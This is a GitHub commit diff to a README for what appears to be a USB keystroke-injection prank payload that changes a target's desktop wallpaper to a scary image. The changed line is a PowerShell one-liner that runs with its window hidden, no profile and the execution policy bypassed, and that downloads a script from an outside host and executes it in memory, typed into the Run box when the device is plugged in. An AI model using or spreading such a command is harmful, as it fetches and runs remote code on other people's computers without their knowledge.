Update README.md

This commit is contained in:
I-Am-Jakoby 2023-01-01 17:14:28 -06:00 committed by GitHub
parent d13adcd5b2
commit 78851cbf66
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -37,7 +37,7 @@ At that point there desktop wallpaper will be changed to the scary image provide
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -Exec Bypass iwr jakoby.lol/0tn | iex
powershell -w h -NoP -NonI -Exec Bypass irm jakoby.lol/0tn | iex
```
<p align="right">(<a href="#top">back to top</a>)</p>